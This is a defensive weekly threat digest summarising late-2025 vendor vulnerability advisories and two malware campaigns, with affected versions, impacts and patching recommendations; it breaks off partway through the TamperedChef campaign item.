Weekly Threat Landscape Digest – Week 48

1. Critical Remote Code Execution Vulnerability in Microsoft SharePoint Online (CVE-2025-59245)
A critical Remote Code Execution (RCE) vulnerability has been identified in Microsoft SharePoint Online, tracked as CVE-2025-59245 (CVSS 9.8, Critical). The issue is caused by unsafe deserialization of untrusted data (CWE-502) and could allow a remote, unauthenticated attacker to execute arbitrary code. Microsoft has already fully mitigated the vulnerability within SharePoint Online, and no customer action is required. There is currently no public exploitation or PoC code available.

Key Details – CVE-2025-59245
• Vulnerability Type: Remote Code Execution (Deserialization of Untrusted Data – CWE-502)
• Affected Product: Microsoft SharePoint Online (Cloud / SaaS)
• Severity: Critical – CVSS v3.1: 9.8
• Attack Vector: Network, unauthenticated
• Root Cause: Unsafe processing of untrusted serialized data

Impact (If Unmitigated)
• Arbitrary code execution inside SharePoint service components
• Unauthorized access or manipulation of SharePoint content
• Potential privilege escalation
• Possible indirect impact on connected M365 services

Status and Exposure
• SharePoint Online: Fully mitigated by Microsoft
• SharePoint On-Prem: Not directly affected; ensure all current patches are applied

Recommended Actions

For SharePoint Online Tenants:
• Mark CVE-2025-59245 as “Mitigated by Cloud Provider” in tracking systems
• Review M365/SharePoint audit logs for unusual admin or application behavior
• Enforce MFA + Conditional Access for privileged accounts

For SharePoint On-Prem / Hybrid:
• Apply all recent SharePoint RCE/security updates
• Restrict admin interfaces to VPN or trusted internal networks
• Monitor for suspicious service or PowerShell activity

Reference
https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-59245

2. Actively Exploited Vulnerability in Oracle Identity Manager (CVE-2025-61757)
   A critical pre-authentication Remote Code Execution (RCE) vulnerability in Oracle Identity Manager, part of Oracle Fusion Middleware, is being actively exploited in the wild. The vulnerability, tracked as CVE-2025-61757 (CVSS 9.8, Critical), allows an unauthenticated remote attacker to compromise the Identity Manager server via HTTP due to missing authentication checks in exposed REST API functions. Successful exploitation leads to full system takeover. Organizations running Oracle Fusion Middleware should apply Oracle’s latest patches immediately and restrict external access.

Key Details – CVE-2025-61757
• Vulnerability Type: Pre-authentication Remote Code Execution
• Product: Oracle Identity Manager (Oracle Fusion Middleware)
• Severity: Critical – CVSS v3.1: 9.8
• Attack Vector: Network-based, no authentication required
• Root Cause: Missing authentication checks on sensitive REST API endpoints
• Affected Versions: 12.2.1.4.0 and 14.1.2.1.0

Impact
• Full compromise of Oracle Identity Manager
• Server takeover and complete administrative control
• Potential compromise of identity workflows, authentication flows, and user accounts
• Lateral movement into integrated middleware and enterprise systems

Recommended Actions
• Apply the latest Oracle Critical Patch Update (CPU) addressing CVE-2025-61757
• Ensure all Oracle Fusion Middleware components are updated, not only Identity Manager
• Restrict external exposure of Identity Manager and related middleware services
• Monitor logs for unusual REST API calls, scripting activity, or suspicious authentication behavior

Reference
https://nvd.nist.gov/vuln/detail/CVE-2025-61757

3. Critical Authentication Bypass Vulnerability in Azure Bastion (CVE-2025-49752)
   A critical authentication bypass vulnerability has been disclosed in Microsoft Azure Bastion, tracked as CVE-2025-49752 (CVSS 10.0, Critical). The flaw allows remote, unauthenticated attackers to completely bypass all authentication controls and escalate privileges to administrative levels with a single network request. Azure Bastion is widely used for secure remote access to Azure Virtual Machines, making this an extremely high-impact vulnerability. Microsoft released an emergency security update on 20 November 2025, and customers are strongly advised to apply the update immediately. No active exploitation has been publicly reported, but the ease of exploitation and severity of impact make this an urgent, high-priority vulnerability.

Key Details – CVE-2025-49752
• Vulnerability Type: Authentication Bypass and Elevation of Privilege
• CWE: CWE-294 (Authentication Bypass by Capture-Replay)
• Severity: Critical – CVSS v3/v4: 10.0
• Attack Vector: Network, no user interaction required
• Impacted Product: All Azure Bastion deployments
• Root Cause: Improper authentication validation enabling bypass of access checks

Impact
• Complete authentication bypass
• Administrative-level access without credentials
• Remote compromise of Azure Virtual Machines accessed through Bastion
• Potential lateral movement across Azure environments
• Risk of full infrastructure takeover

Recommended Actions
• Apply Microsoft’s latest security update for Azure Bastion (Released 20 November 2025)
• Ensure all Azure Bastion resources have the updated build
• Enable automatic updates for Azure-managed services where possible
• Review Azure Activity Logs and Bastion connection logs for suspicious access patterns
• Enforce Conditional Access and MFA for all privileged Azure accounts

Reference
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49752

4. High-Severity Vulnerability in F5 BIG-IP DNS (CVE-2025-40780)
   A high-severity vulnerability has been identified in BIND components used within F5 BIG-IP DNS resolvers. The flaw, tracked as CVE-2025-40780 (CVSS 7.5, High), stems from a weakness in BIND’s Pseudo Random Number Generator (PRNG). This weakness allows attackers to predict DNS query IDs and source ports, making it possible to conduct DNS cache poisoning attacks. Successful exploitation could redirect user traffic to attacker-controlled infrastructure, enabling phishing, malware distribution, service disruption, and interception of sensitive data.

Key Details – CVE-2025-40780
• Vulnerability Type: Predictable PRNG leading to DNS Cache Poisoning
• Affected Component: BIND resolver within BIG-IP DNS
• Severity: High – CVSS v3.1: 7.5
• Attack Vector: Network
• Root Cause: Weak randomness in BIND PRNG enabling predictable DNS query parameters

Impact
• Injection of forged DNS records into resolver cache
• Redirection of users to malicious or attacker-controlled IPs
• Potential interception or manipulation of network traffic
• Disruption of application routing and service availability
• Increased risk of phishing, credential theft, and malware delivery

Affected Products
• BIND 9:

Versions 9.16.0–9.16.50

Versions 9.18.0–9.18.39

Versions 9.20.0–9.20.13

Versions 9.21.0–9.21.12

Extended Support: 9.16.8-S1–9.16.50-S1, 9.18.11-S1–9.18.39-S1, 9.20.9-S1–9.20.13-S1
• F5 BIG-IP DNS:

Versions 15.x

Versions 16.x

Versions 17.x

Versions 21.x

Recommended Actions
• Apply vendor-provided F5 and BIND patches as soon as they are released
• Upgrade all affected versions to the latest secure builds
• Review DNS resolver security configurations (DNSSEC, response rate limiting, ACLs)
• Monitor DNS logs for suspicious or abnormal query/response behavior
• Limit exposure of DNS resolvers to untrusted networks

Reference
https://my.f5.com/manage/s/article/K000157948

5. Security Updates – Chrome OS
   Google has released a new Long Term Support (LTS) update for Chrome OS addressing multiple security vulnerabilities, including a high-severity type confusion flaw in the V8 JavaScript engine. These vulnerabilities could allow attackers to execute arbitrary code, escalate privileges, or cause system instability through malicious web content or applications. Users and administrators are advised to update Chrome OS to the latest LTS version immediately.

Key Vulnerabilities
• CVE-2025-13224 – Type Confusion in V8 (High Severity)

A flaw in the V8 JavaScript engine may allow arbitrary code execution or system crashes through crafted web content or malicious apps.
• Additional vulnerabilities included in this update:

CVE-2025-21700

CVE-2025-21702

CVE-2025-21703

CVE-2025-21756

CVE-2025-21836

CVE-2025-21971

CVE-2025-37752

CVE-2025-37756

CVE-2025-37798

CVE-2024-27397

Fixed Version
• Chrome OS LTS Version: 138.0.7204.298
• Platform Version: 16295.83.0

Impact
• Arbitrary code execution via malicious JavaScript or web content
• Possible privilege escalation
• Potential browser or system instability
• Increased risk for users regularly accessing untrusted websites

Recommended Actions
• Update all Chrome OS devices to LTS version 138.0.7204.298 or later
• Ensure automatic updates are enabled across Chrome OS fleets
• Monitor Chrome OS devices for unusual behavior or performance anomalies
• Review enterprise policies to enforce secure update channels

Reference
https://chromereleases.googleblog.com/2025/11/long-term-support-channel-updatefor_21.html

6. Security Updates – Apple (CVE-2025-43515)
   Apple has released a security update for Compressor, addressing a high-severity vulnerability that could allow an unauthenticated attacker on the same network to execute arbitrary code on affected systems. The vulnerability, tracked as CVE-2025-43515 (CVSS 8.8, High), stems from improper handling of external network connections within Compressor. Successful exploitation may result in unauthorized access, compromise of system integrity, or full control of the Compressor server. All users running affected versions should update immediately.

Key Details – CVE-2025-43515
• Vulnerability Type: Remote Code Execution
• Severity: High – CVSS v3.1: 8.8
• Root Cause: Improper handling of external network connections
• Impact: Arbitrary code execution by unauthenticated users on the same network
• Risk: Unauthorized access, system compromise, potential full server takeover

Affected Products
• Compressor 4.11.0 and earlier
• Systems running macOS Sequoia 15.6 and later

Fixed Version
• Compressor 4.11.1 or later

Impact
• Attacker may execute malicious code on Compressor servers
• Potential takeover or manipulation of video encoding workflows
• Compromise of system integrity or broader macOS environment

Recommended Actions
• Update Compressor to version 4.11.1 or later
• Ensure macOS systems are fully updated to the latest security release
• Restrict access to Compressor servers on internal networks
• Monitor affected systems for unusual activity following update

References
https://support.apple.com/en-us/125693
https://www.tenable.com/cve/CVE-2025-43515

7. High-Severity Local Privilege Escalation Vulnerability in ASUS (CVE-2025-59373)
   ASUS has released security updates to address a high-severity Local Privilege Escalation (LPE) vulnerability in the ASUS System Control Interface Service, a core component used by the MyASUS application across ASUS desktops, laptops, NUC devices, and All-in-One systems. The vulnerability, tracked as CVE-2025-59373 (CVSS 8.5, High), allows a low-privileged attacker or malware running as a standard Windows user to escalate privileges to SYSTEM, the highest permission level on Windows. The flaw is caused by improper validation in a file-restore mechanism, which can allow unprivileged users to copy or replace files in protected system paths. ASUS has released patched versions for both x64 and ARM platforms, and updates should be applied immediately.

Key Details – CVE-2025-59373
• Vulnerability Type: Local Privilege Escalation (LPE)
• Severity: High – CVSS v4.0 Score: 8.5
• Attack Vector: Local
• Root Cause: Improper validation allowing unauthorized file replacement in protected paths
• Impacted Component: ASUS System Control Interface (used by MyASUS on all major ASUS devices)

Impact
• Escalation of privileges from standard user to SYSTEM
• Complete control over affected ASUS systems
• Potential for malware to gain full administrative access
• Risk of system manipulation, persistence, or disabling of security controls

Fixed Versions
• ASUS System Control Interface 3.1.48.0 (x64)
• ASUS System Control Interface 4.2.48.0 (ARM)

Recommended Actions
• Apply the latest ASUS patches immediately on all affected systems
• Ensure automated updates are enabled for MyASUS and ASUS system utilities
• Monitor endpoints for privilege escalation attempts or unusual file replacement behavior
• Restrict local user privileges where possible to reduce exploit potential

Reference
https://www.asus.com/security-advisory/

8. Multiple Vulnerabilities in SonicWall Email Security and Firewalls
   SonicWall has disclosed several high-severity vulnerabilities affecting SonicWall Email Security appliances and SonicOS SSLVPN services. These issues include stack-based buffer overflow, download of code without integrity checks, and path traversal flaws. Successful exploitation may result in denial of service, persistent arbitrary code execution, or unauthorized file access.
9. CVE-2025-40601 – Stack-Based Buffer Overflow (SonicOS SSLVPN)
   • Severity: CVSS 7.5 (High)
   • Impact: Remote unauthenticated attackers can trigger DoS and crash the firewall
   • Affected Component: SonicOS SSLVPN service (only if enabled)

Affected Platforms & Versions (CVE-2025-40601)
• Gen7 Hardware Firewalls: TZ270/TZ270W, TZ370/TZ370W, TZ470/TZ470W, TZ570/TZ570W/TZ570P, TZ670, NSa 2700/3700/4700/5700/6700, NSsp 10700/11700/13700/15700
• Gen7 Virtual Firewalls (NSv): NSv270, NSv470, NSv870 (ESX, KVM, Hyper-V, AWS, Azure)
• Affected Versions: 7.3.0-7012 and earlier (7.0.1 not affected)
• Gen8 Hardware Firewalls: TZ80–TZ680, NSa 2800–5800
• Affected Versions: 8.0.2-8011 and earlier
Fixed Versions:
• Gen7: 7.3.1-7013 and later
• Gen8: 8.0.3-8011 and later

2. CVE-2025-40604 – Download of Code Without Integrity Check (Email Security)
   • Severity: CVSS 7.2 (High)
   • Description: Email Security appliances load root filesystem images without signature validation
   • Impact: Attackers with datastore or VMDK access can modify system files and achieve persistent arbitrary code execution
3. CVE-2025-40605 – Path Traversal Vulnerability (Email Security)
   • Severity: CVSS 4.9 (Medium)
   • Description: Crafted directory traversal sequences (../) allow access to restricted paths
   • Impact: Unauthorized read access to files outside the intended directory scope

Affected Email Security Products (CVE-2025-40604 & CVE-2025-40605)
• ES 5000, 5050, 7000, 7050, 9000, VMware, Hyper-V
• Affected Versions: 10.0.33.8195 and earlier
Fixed Versions: 10.0.34.8215, 10.0.34.8223 and later

Impact Summary
• Remote DoS on firewalls running SonicOS SSLVPN
• Persistent arbitrary code execution on Email Security appliances
• Unauthorized file access via path traversal
• System instability, data compromise, or malicious persistence

Recommended Actions
• Update all affected SonicWall firewalls and Email Security appliances to fixed versions
• Disable SonicOS SSLVPN if not required
• Restrict access to datastore/VMDK environments
• Monitor logs for unusual access attempts, crashes, or anomalies
• Segment management interfaces from untrusted networks

References
https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0018
https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0016

9. Multiple Vulnerabilities in HPE Aruba Networking Products
   Multiple high-severity vulnerabilities have been identified across HPE Aruba Networking AirWave, 100 Series Cellular Bridge, and AOS-CX software. These issues include command injection, remote code execution (RCE), directory traversal, denial of service (DoS), privilege escalation, and exposure of sensitive information. Successful exploitation may allow attackers to execute arbitrary commands, disrupt network operations, escalate privileges, or gain unauthorized access.
10. HPE Aruba AirWave – Multiple Vulnerabilities
    • CVE-2025-37163 – Authenticated Command Injection in CLI
    • CVE-2024-12084 to CVE-2024-12088, CVE-2024-12747 – Rsync Daemon Vulnerabilities (RCE, Directory Traversal, Information Disclosure)
    Affected Versions: AirWave 8.3.0.4 and below
    Fixed Versions: AirWave 8.3.0.5 and above
11. HPE Aruba 100 Series Cellular Bridge – Multiple Vulnerabilities
    • CVE-2025-37161 – Unauthenticated Remote DoS via Web Management Interface
    • CVE-2025-37162 – Authenticated Command Injection (Arbitrary Remote Command Execution)
    Affected Versions: AOS-10.7.1.x (10.7.1.1 and below)
    Fixed Versions: AOS-10.7.2.0 and above
12. HPE Aruba AOS-CX – Multiple Vulnerabilities
    • CVE-2025-37155 – Authenticated Privilege Escalation
    • CVE-2025-37156 – Platform-Level DoS
    • Rsync Daemon Issues: CVE-2024-12084 to CVE-2024-12088, CVE-2024-12747
    • CVE-2025-37157 / CVE-2025-37158 – Authenticated Command Injection
    • CVE-2025-26466 – DoS via OpenSSH Client/Server
    • CVE-2025-37159 – Authenticated Session Hijacking
    • CVE-2024-37160 – Authenticated Broken Access Control in REST API

Affected AOS-CX Versions:
• 10.16.xxxx: 10.16.1000 and below
• 10.15.xxxx: 10.15.1020 and below
• 10.14.xxxx: 10.14.1050 and below
• 10.13.xxxx: 10.13.1090 and below
• 10.10.xxxx: 10.10.1160 and below

Fixed Versions:
• 10.16.xxxx: 10.16.1001 and above
• 10.15.xxxx: 10.15.1030 and above
• 10.14.xxxx: 10.14.1060 and above
• 10.13.xxxx: 10.13.1101 and above
• 10.10.xxxx: 10.10.1170 and above

Impact Summary
• Arbitrary command execution
• Remote DoS affecting network availability
• Unauthorized access to configuration and sensitive data
• Authentication bypass and session hijacking
• Escalation of privileges within managed environments

Recommended Actions
• Apply HPE-provided patches or mitigation steps immediately
• Upgrade all affected AirWave, 100 Series Cellular Bridge, and AOS-CX versions
• Restrict management interfaces to trusted networks
• Monitor logs for unusual authentication, command, or session activity
• Enforce strong RBAC and network segmentation

References
https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04888en_us
https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04970en_us
https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04971en_us

10. Critical Vulnerability in Apache Causeway
    A critical remote code execution (RCE) vulnerability has been identified in Apache Causeway, a framework widely used for building domain-driven Java applications. The flaw exists in the ViewModel functionality and allows authenticated attackers to exploit unsafe Java deserialization processes, enabling arbitrary code execution through malicious URL parameters.

Vulnerability Details
• CVE-2025-64408
• Severity: Critical
• Affected Component: ViewModel functionality
• The issue results from unsafe Java deserialization triggered via user-controlled URL parameters. When processing ViewModel-based requests, affected versions reconstruct serialized object graphs, allowing an attacker to inject malicious serialized payloads.
• Impact: Authenticated attackers can execute arbitrary code within the application by supplying crafted URL parameters.

Affected Versions
• Apache Causeway 2.0.0 to 3.4.0
• Apache Causeway 4.0.0-M1

Fixed Version
• Apache Causeway 3.5.0 or later

Recommended Actions
• Update affected deployments to Apache Causeway 3.5.0 or later
• Review application logs for suspicious URL parameter patterns or deserialization-related errors
• Restrict access to administrative or sensitive ViewModel endpoints
• Implement strict input validation and disable unsafe deserialization features where possible

References
https://nvd.nist.gov/vuln/detail/CVE-2025-64408

11. Multiple Vulnerabilities in HPE Telco Service Activator
    Multiple vulnerabilities have been identified in HPE Telco Service Activator that could allow remote attackers to cause denial-of-service (DoS) conditions through improper handling of system resources. Successful exploitation may lead to service disruption, resource exhaustion, and degraded performance across affected deployments.

Vulnerability Details
• CVE-2025-9784 — Uncontrolled Resource Consumption
– CVSS v3.1: 7.5 (High)
– Impact: Remote attackers may trigger excessive consumption of system resources, potentially causing complete service outages.

• CVE-2025-48795 — Resource Management Weakness
  – CVSS v3.1: 5.6 (Medium)
  – Impact: High-complexity attack leading to partial loss of confidentiality, integrity, and availability due to improper shutdown or release of resources.
• CVE-2025-8916 — Allocation of Resources Without Limits
  – CVSS v3.1: 5.3 (Medium)
  – Impact: Attackers can cause uncontrolled resource allocation, resulting in degraded performance.

Affected Versions
• HPE Telco Service Activator 10.3.3 and earlier

Fixed Versions
• HPE Telco Service Activator 10.4.0 or later

Recommended Actions
• Update to Telco Service Activator v10.4.0 or later
• Apply all vendor-released security advisories and patches
• Monitor system performance and logs for signs of resource exhaustion
• Implement rate limiting or workload management controls to reduce DoS exposure

References
https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04973en_us

12. High-Severity Vulnerability in Vault Terraform
    A high-severity vulnerability has been disclosed in the Vault Terraform Provider that could allow attackers to authenticate to HashiCorp Vault without valid credentials under specific LDAP configurations. The issue stems from insecure defaults related to LDAP anonymous binds, potentially leading to unauthorized access and compromise of sensitive secrets.

Vulnerability Details
• CVE-2025-13357
• CVSS Score: 7.4 (High)
• Affected Component: Vault Terraform Provider (LDAP authentication configuration)
• The issue is caused by the deny_null_bind parameter being incorrectly set to false, allowing LDAP “null” or anonymous binds.
• If the backend LDAP server allows anonymous binding, attackers can authenticate to Vault without providing a password.
• Impact: Unauthorized access, potential privilege escalation, and exposure of secrets, tokens, and protected Vault resources.

Affected Versions
• Vault Terraform Provider v4.2.0 through v5.4.0

Fixed Version
• Vault Terraform Provider v5.5.0 or later

Recommended Actions
• Upgrade to version v5.5.0 or later immediately
• Review LDAP authentication configurations to ensure deny_null_bind is enforced
• Disable anonymous binds on backend LDAP servers
• Audit existing Vault access logs for unexpected LDAP bind behaviors

References
https://discuss.hashicorp.com/t/hcsec-2025-33-vault-terraform-provider-applied-incorrect-defaults-for-ldap-auth-method/76822

13. Apache Syncope AES Default Encryption Key Vulnerability
    A high-severity vulnerability has been identified in Apache Syncope affecting deployments that use AES encryption to store internal user password values. The flaw stems from the use of a hard-coded default AES key, which allows attackers with database access to decrypt and recover cleartext passwords, potentially leading to widespread credential compromise and privilege escalation across integrated systems.

Vulnerability Details
• CVE-2025-65998
• Base Score: 7.5 (High)
• When AES encryption is enabled, Apache Syncope uses a hard-coded default AES key, instead of generating or requiring a unique deployment-specific key.
• Impact: An attacker with access to the application database can:

Retrieve encrypted password values

Decrypt them using the known default key

Recover cleartext user credentials, which may also grant access to downstream systems connected via provisioning connectors

Affected Versions
• Syncope 2.1 – 2.1.14
• Syncope 3.0 – 3.0.14
• Syncope 4.0 – 4.0.2

Fixed Versions
• Syncope 3.0.15
• Syncope 4.0.3

Recommended Actions
• Immediately upgrade to Syncope 3.0.15 or 4.0.3
• If AES encryption is used, rotate all stored credentials after the upgrade
• Implement secure key management practices and ensure unique encryption keys are used per deployment
• Restrict access to the Syncope database and monitor for suspicious access attempts

References
https://lists.apache.org/thread/fjh0tb0d1xkbphc5ogdsc348ppz88cts

14. Denial of Service (DoS) Vulnerability in SonicOS
    A high-severity stack-based buffer overflow vulnerability has been disclosed in the SonicOS SSLVPN service, allowing remote unauthenticated attackers to trigger a Denial-of-Service (DoS) condition on affected firewalls. This vulnerability, tracked as CVE-2025-40601, may cause impacted devices to crash before authentication occurs.

Vulnerability Details
• CVE-2025-40601
• Severity: High (CVSS v3.0: 7.5)
• Type: Stack-Based Buffer Overflow
• CWE-121: Improper Restriction of Operations within the Bounds of a Memory Buffer
• Exploitation allows an unauthenticated attacker to send crafted requests to the SSLVPN service, resulting in a crash and loss of availability.
• No active exploitation has been observed, but SonicWall advises immediate mitigation.

Affected Products
• Gen7 Hardware Firewalls: TZ270, TZ270W, TZ370, TZ370W, TZ470, TZ470W, TZ570, TZ570W, TZ570P, TZ670, NSa 2700, NSa 3700, NSa 4700, NSa 5700, NSa 6700, NSsp 10700, NSsp 11700, NSsp 13700, NSsp 15700
– Affected Versions: 7.3.0-7012 and older (7.0.1 branch not affected)

• Gen7 Virtual Firewalls (NSv): NSv270, NSv470, NSv870 (ESX, KVM, HYPER-V, AWS, Azure)
  – Affected Versions: 7.3.0-7012 and older
• Gen8 Firewalls: TZ80, TZ280, TZ380, TZ480, TZ580, TZ680, NSa 2800, NSa 3800, NSa 4800, NSa 5800
  – Affected Versions: 8.0.2-8011 and older

Fixed Versions
• Gen7 Hardware & Virtual Firewalls: 7.3.1-7013 and later
• Gen8 Firewalls: 8.0.3-8011 and later

Recommended Actions
• Apply the latest firmware updates for all affected SonicWall platforms
• If patching is not immediately possible, restrict access to SSLVPN interfaces
• Monitor logs for abnormal SSLVPN activity or repeated crash events
• Assess firewall availability and ensure redundancy where applicable

References
https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0016

15. Security Updates – NVIDIA
    NVIDIA has released multiple security updates addressing vulnerabilities across DGX Spark, NeMo Framework, and the NeMo Agent Toolkit. These vulnerabilities range from code execution and privilege escalation to data tampering, information disclosure, and denial of service, potentially impacting AI infrastructure, LLM processing pipelines, and high-performance computing devices.

Vulnerability Details

Critical Severity
• CVE-2025-33187 (DGX Spark): Vulnerability in DGX Spark GB10 SROOT allowing privileged users to access protected SoC areas, potentially leading to code execution, data tampering, information disclosure, denial of service, or privilege escalation.

High Severity
• CVE-2025-33188 (DGX Spark): Hardware resource tampering may lead to information disclosure, data tampering, and DoS.
• CVE-2025-33189 (DGX Spark): SROOT firmware out-of-bound write enabling code execution, information disclosure, tampering, DoS, and privilege escalation.
• CVE-2025-33204 (NeMo Framework): NLP/LLM code injection vulnerability allowing arbitrary code execution, privilege escalation, data access, and tampering.
• CVE-2025-33205 (NeMo Framework): Improper predefined variable handling enabling code execution.
• CVE-2025-33203 (NeMo Agent Toolkit): SSRF vulnerability in chat API endpoint allowing information disclosure and DoS.

Medium Severity
• CVE-2025-33190 (DGX Spark): SROOT out-of-bound write leading to code execution, tampering, DoS, or escalation.
• CVE-2025-33191 (DGX Spark): OSROOT invalid memory read potentially triggering DoS.
• CVE-2025-33192–33197 (DGX Spark): Multiple SROOT issues involving arbitrary memory read, improper validation, unexpected operations, resource reuse, and NULL pointer dereference — enabling data disclosure, tampering, DoS, or code execution.

Low Severity
• CVE-2025-33198–33200 (DGX Spark): Resource reuse and incorrect control flow vulnerabilities potentially causing information disclosure or data tampering.

Affected Products & Fixed Versions
• DGX Spark: All versions prior to OTA0 → Update to OTA0
• NeMo Framework: All versions prior to 2.5.1 → Update to 2.5.1
• NeMo Agent Toolkit: All versions prior to 1.3.0 → Update to 1.3.0

Recommended Actions
• Apply all NVIDIA-released security updates immediately
• Upgrade DGX Spark, NeMo Framework, and NeMo Agent Toolkit to fixed versions
• Review system logs for unusual memory operations or tampering
• Restrict privileged access on DGX Spark hardware environments
• Monitor LLM and NLP workloads for abnormal execution patterns

References
https://nvidia.custhelp.com/app/answers/detail/a_id/5720
https://nvidia.custhelp.com/app/answers/detail/a_id/5729
https://nvidia.custhelp.com/app/answers/detail/a_id/5726

16. Critical Vulnerability in ABB Ability Edgenius
    A critical authentication bypass vulnerability has been identified in ABB Ability Edgenius Management Portal. The flaw enables unauthenticated attackers to access privileged system functions, including application management and configuration control, posing a severe risk to edge environments.

Vulnerability Details
• CVE-2025-10571
• CVSS v3.1 Score: 9.6 (Critical)
• The vulnerability arises from improper authentication validation, allowing specially crafted messages to bypass authentication checks.
• Successful exploitation allows an unauthenticated attacker to:
– Install or uninstall applications
– Execute arbitrary code
– Modify deployed application configurations
– Obtain full administrative control over the edge environment

Affected Versions
• ABB Ability Edgenius 3.2.0.0
• ABB Ability Edgenius 3.2.1.1

Fixed Version
• ABB Ability Edgenius 3.2.2.0 or later

Recommended Actions
• Update all affected Edgenius deployments to version 3.2.2.0 or later
• Restrict network access to Edgenius Management Portal interfaces
• Implement network segmentation to isolate edge management systems
• Monitor logs for suspicious unauthenticated access attempts
• Ensure strong authentication and least-privilege access controls are applied

References
https://search.abb.com/library/Download.aspx?DocumentID=7PAA022088&LanguageCode=en&DocumentPartId=&Action=Launch 

17. Critical Vulnerability in Grafana Enterprise
    A critical privilege-escalation vulnerability has been identified in the SCIM provisioning feature of Grafana Enterprise. The flaw allows a malicious or compromised SCIM client to manipulate user identity fields, enabling unauthorized escalation to administrative privileges, including impersonation of the Admin user.

Vulnerability Details
• CVE-2025-41115
• Severity: Critical (CVSS 10.0)
• The vulnerability results from improper handling of SCIM user identity mapping within Grafana Enterprise.
• A compromised or malicious SCIM client can alter identity attributes during provisioning, allowing:
– Full privilege escalation
– Administrative account impersonation
– Unauthorized access to dashboards, data sources, and integrations
– Complete compromise of the Grafana Enterprise environment

Affected Versions
• Grafana Enterprise 12.0.0 → 12.2.1

Fixed Versions
• Grafana Enterprise 12.3.0
• Grafana Enterprise 12.2.1
• Grafana Enterprise 12.1.3
• Grafana Enterprise 12.0.6

Recommended Actions
• Immediately update all affected Grafana Enterprise instances to a fixed version
• Audit SCIM client configurations and remove unauthorized provisioning clients
• Review Grafana user logs for suspicious identity changes or privilege escalation attempts
• Apply network restrictions to limit which systems can interact with the SCIM API
• Enforce least-privilege access for identity provisioning systems

References
https://grafana.com/blog/2025/11/19/grafana-enterprise-security-update-critical-severity-security-fix-for-cve-2025-41115/

18. Denial-of-Service (DoS) Vulnerability in TP-Link Routers
    A high-severity Denial-of-Service (DoS) vulnerability has been discovered in the TP-Link TL-WR940N V6 router. The flaw affects all firmware versions up to Build 220801 and resides in the router’s UPnP module, where improper input validation allows adjacent-network attackers to crash the UPnP service and disrupt network functionality.

Vulnerability Details
• CVE-2025-11676
• CVSS v4.0: 7.1 (High)
• The vulnerability stems from improper input validation within the UPnP module.
• An unauthenticated attacker on the adjacent network can send malicious UPnP packets that trigger a crash of the UPnP service.
• Impact:
– UPnP service becomes unavailable
– Automatic port forwarding and other dependent functions fail
– Local network instability or degraded performance

Affected & Fixed Versions
• Product Model: TL-WR940N V6
• Affected Version: ≤ Build 220801
• Fixed Versions: Build 250919, Build 250925

Recommended Actions
• Update TL-WR940N V6 to the latest available patched firmware
• Disable UPnP if it is not required for operational needs
• Restrict access to local network segments to reduce exposure
• Monitor router logs for repeated UPnP crashes or malformed traffic

References
https://www.tp-link.com/us/support/faq/4755/

19. High-Severity Vulnerability in Synology DSM
    A high-severity authentication bypass vulnerability has been identified in Synology DiskStation Manager (DSM). The flaw allows remote attackers to bypass authentication controls if they possess prior knowledge of a valid distinguished name (DN), potentially enabling unauthorized access to affected NAS systems.

Vulnerability Details
• CVE-2025-13392
• CVSS v3 Base Score: 8.1 (High)
• The vulnerability allows an attacker with knowledge of a valid DN to bypass authentication in specific DSM versions.
• Impact:
– Unauthorized remote access
– Potential compromise of NAS data and system integrity
– Access to shared resources, backups, and administrative settings

Affected Products & Fixed Versions
• DSM 7.3: Update to 7.3.1-86003-1 or later
• DSM 7.2.2: Update to 7.2.2-72806-5 or later

Recommended Actions
• Immediately update to the latest DSM security release
• Review authentication logs for unusual or repeated DN-based login attempts
• Enforce strong DN secrecy and restrict LDAP/Directory exposure
• Implement network segmentation to limit access to DSM management interfaces
• Enable two-factor authentication (2FA) for DSM accounts

References
https://www.synology.com/en-my/security/advisory/Synology_SA_25_14

20. Sturnus Android Banking Trojan Captures Encrypted Chats and Enables Full Device Takeover
    A newly discovered Android banking trojan named Sturnus has been identified with advanced capabilities enabling credential theft, financial fraud, encrypted chat capture, and full remote control of infected devices. The malware is currently assessed to be in an evaluation phase and is privately operated, targeting financial institutions across Southern and Central Europe.

Key Technical Details
• Sturnus can bypass encrypted messaging by capturing decrypted content directly from the device screen, enabling surveillance of WhatsApp, Telegram, and Signal.
• The trojan performs overlay attacks, displaying fake login screens over banking apps to harvest credentials.
• Distributed via malicious apps including:
– Google Chrome (fake variant: com.klivkfbky.izaybebnx)
– Preemix Box (com.uvxuthoq.noscjahae)
• Uses a mixed communication pattern (plaintext, AES, RSA), inspiring its name “Sturnus” after the vocal-mimicking starling bird.
• Establishes WebSocket + HTTP channels to register compromised devices and receive task payloads.
• Opens a persistent WebSocket channel enabling remote control via VNC-like sessions.

Capabilities & Behavior
• Abuses Android Accessibility Services to:
– Capture keystrokes
– Monitor UI interactions
– Read chat content from Signal, Telegram, WhatsApp
– Record all visible interface elements
• After harvesting credentials from a targeted bank, the corresponding overlay is disabled to avoid suspicion.
• Supports full-screen fake OS update overlays, blocking user visibility while malicious activity runs in the background.
• Enables remote interaction with the infected device:
– Text input
– Clicks & gestures
– Scrolling
– Permission dialogs
– App launches
– Black-screen overlays
• Includes a real-time screen mirroring mechanism using Android’s display-capture framework.
• Prevents removal by:
– Detecting attempts to disable admin rights
– Automatically navigating away from settings screens
– Blocking uninstall & ADB removal until admin rights are revoked

Additional Features
• Extensive environment monitoring:
– Sensor data
– Hardware and network info
– Installed apps inventory
• Enables attackers to dynamically adjust tactics to evade detection.
• Current spread remains limited but indicates preparation for large-scale, coordinated financial attacks.

Google Statement
Google confirmed that Google Play Protect detects and blocks known versions of Sturnus.

Reference
https://thehackernews.com/2025/11/new-sturnus-android-trojan-quietly.html

21. TamperedChef Malware Campaign Abuses Signed Applications for Stealth and Persistence
    A new malware campaign tracked as TamperedChef has been identified abusing legitimately signed applications, malvertising, and fraudulent download portals to deliver modular malware capable of credential theft, persistence, and long-term system compromise. The campaign relies heavily on social engineering and code-signing trust models to evade security controls.

Key Technical Details
• Threat actors use code-signing certificates obtained through U.S.-registered shell companies, allowing their malicious apps to appear trustworthy.
• Malware is distributed via:
